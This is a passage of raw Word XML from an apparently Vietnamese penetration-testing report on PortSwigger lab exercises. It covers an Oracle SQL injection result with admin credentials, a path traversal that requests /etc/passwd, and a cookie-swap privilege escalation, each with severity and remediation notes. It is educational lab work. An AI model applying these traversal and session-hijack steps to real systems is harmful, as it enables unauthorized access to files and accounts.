                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3439795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C8B85" w14:textId="6771B759" w:rsidR="00F67FB2" w:rsidRDefault="008C67B8" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lúc này đã </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00700E23">
        <w:t xml:space="preserve">có được tài khoản đăng nhập với quyền admin, với </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00700E23">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00700E23">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00700E23">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>nb52oxl7kb7fjchut21n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50213CD1" w14:textId="3BDACA42" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="00BC4913" w:rsidP="008C67B8">
      <w:r w:rsidRPr="008C67B8">
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>ăng nhập lại và thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626ED0D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00700E23" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700E23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B702D5" wp14:editId="08F48A03">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="799668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68047" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3439795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60DE5E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2"/>
    <w:p w14:paraId="253FA367" w14:textId="7DDF0EB8" w:rsidR="00F67FB2" w:rsidRPr="004F7CAE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000F79BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>High (cao) vì lỗ hổng này cho phép kẻ tấn công truy cập và trích xuất thông tin nhạy cảm từ cơ sở dữ liệu, bao gồm tài khoản người dùng và mật khẩu với quyền admin. Điều này có thể dẫn đến việc kẻ tấn công chiếm quyền điều khiển hệ thống, gây rò rỉ dữ liệu, và làm tổn hại đến toàn bộ bảo mật của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C6570" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00315F42" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00B050BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>Sử dụng filter đầu vào và cơ chế blacklist hoặc whitelist để ngăn chặn các cuộc tấn công SQL injection, đặc biệt là việc liệt kê nội dung cơ sở dữ liệu trên Oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077BE5D7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc182429522"/>
      <w:bookmarkStart w:id="75" w:name="_Toc182909883"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7D45">
        <w:t>: File path traversal, traversal sequences blocked with absolute path bypass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="358917A1" w14:textId="11D1EC91" w:rsidR="008C67B8" w:rsidRDefault="008C67B8" w:rsidP="008C67B8">
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59D94459" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mô tả lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>Lỗi thiết kế URL, có thể sửa đổi URL để khai thác th</w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>ng tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20037D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00D3612A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32C79A" w14:textId="65D53699" w:rsidR="00F67FB2" w:rsidRPr="00664855" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>họn một hình bất kỳ trên web và quan sát trên phần mềm Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592015B7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00EA5934">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285F4678" wp14:editId="6A1F37F7">
            <wp:extent cx="6115050" cy="2429510"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="470108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08383" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2429510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE0537" w14:textId="6CDFA5BC" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> Từ bước 1, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nhận </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve">thấy rằng trường thông tin </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>image?filename=45.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> đang được truy vấn xuống trực tiếp bên dưới. Ý tưởng tiếp theo </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t>thay đổi trường thông tin này thành</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>image?filename=/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve">để có thể xem nơi lưu </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4AF2DC" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00EA5934">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB2FEC8" wp14:editId="4FE528C1">
            <wp:extent cx="6115050" cy="2994025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1669555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55097" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2994025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7253C0A1" w14:textId="4D30E5FC" w:rsidR="00F67FB2" w:rsidRPr="00664855" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00664855">
        <w:t xml:space="preserve"> Sau </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>khi thực hiện gởi thì khi quay lại, thấy kết quả thành công</w:t>
      </w:r>
      <w:r w:rsidR="008C67B8">
        <w:t xml:space="preserve"> và hoàn thành bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1211D11C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00611AB8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255955BF" wp14:editId="6F3B4DDC">
            <wp:extent cx="6115050" cy="2806065"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2090533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33483" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId171"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2806065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="508FD2F2" w14:textId="3B105891" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000F79BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>High (cao) vì lỗ hổng này cho phép kẻ tấn công có thể dễ dàng truy cập và đọc các tệp hệ thống nhạy cảm, như tệp /etc/passwd, từ đó có thể thu thập thông tin nhạy cảm hoặc khai thác hệ thống. Điều này có thể dẫn đến việc rò rỉ dữ liệu quan trọng và tăng nguy cơ tấn công sâu vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663926C5" w14:textId="44B251CB" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="00F67FB2" w:rsidP="008C67B8">
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3612A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>Chặn các filter đầu vào của URL và kiểm tra cẩn thận trước khi xử lý để ngăn chặn lỗ hổng File Path Traversal, đặc biệt là việc bypass các chuỗi traversal với đường dẫn tuyệt đối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399149A7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc182429523"/>
      <w:bookmarkStart w:id="77" w:name="_Toc182909884"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7D45">
        <w:t>: Multi-step process with no access control on one step</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="694FC887" w14:textId="25554243" w:rsidR="008C67B8" w:rsidRDefault="008C67B8" w:rsidP="008C67B8">
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/access-control/lab-multi-step-process-with-no-access-control-on-one-step</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05A0EC50" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00D3612A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C67B8">
        <w:t>Thực hiện chỉnh sửa gói tin trên cookie để leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09967B14" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="006E36F3" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3612A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC62B7" w14:textId="0EE2574D" w:rsidR="00F67FB2" w:rsidRPr="00A102CB" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:t xml:space="preserve">iến hành </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:t xml:space="preserve">bắt gói tin khi thực hiện đăng nhập với admin và nâng quyền cho </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:t xml:space="preserve"> sau đó. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2963E604" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00B8304D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5126EA15" wp14:editId="5CEEF687">
            <wp:extent cx="6115050" cy="1823085"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="305259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59470" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1823085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="787BF1B4" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gởi tới Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F486D1" w14:textId="27BC8E17" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00D77112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00D77112">
        <w:t xml:space="preserve">iếp tục </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00D77112">
        <w:t>Forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4E6A7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00B8304D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56747D25" wp14:editId="4DF1E80E">
            <wp:extent cx="6115050" cy="2253615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="620443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43626" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2253615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78716FA1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gởi tới Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D460F6" w14:textId="43EB911B" w:rsidR="00F67FB2" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> Đăng nhập với wiener vs </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00D77112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wiener</w:t>
      </w:r>
      <w:r w:rsidR="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00D77112">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C67B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>peter</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>để lấy cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18987F62" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E36F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54604557" wp14:editId="0C50F5CC">
            <wp:extent cx="3092609" cy="3410125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1024829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29658" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3092609" cy="3410125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B870E" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Cookie: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E36F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>G4xcxE85lMNjlD4dSObjl0GBWjm5U3bV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B58DD42" w14:textId="0427597C" w:rsidR="00F67FB2" w:rsidRPr="008C67B8" w:rsidRDefault="00BC4913" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BC4913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00211461">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00211461">
        <w:t xml:space="preserve">hực hiện thay đổi cookie thành </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008C67B8">
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00A102CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> weiner</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00211461">
        <w:t xml:space="preserve"> và username thành </w:t>
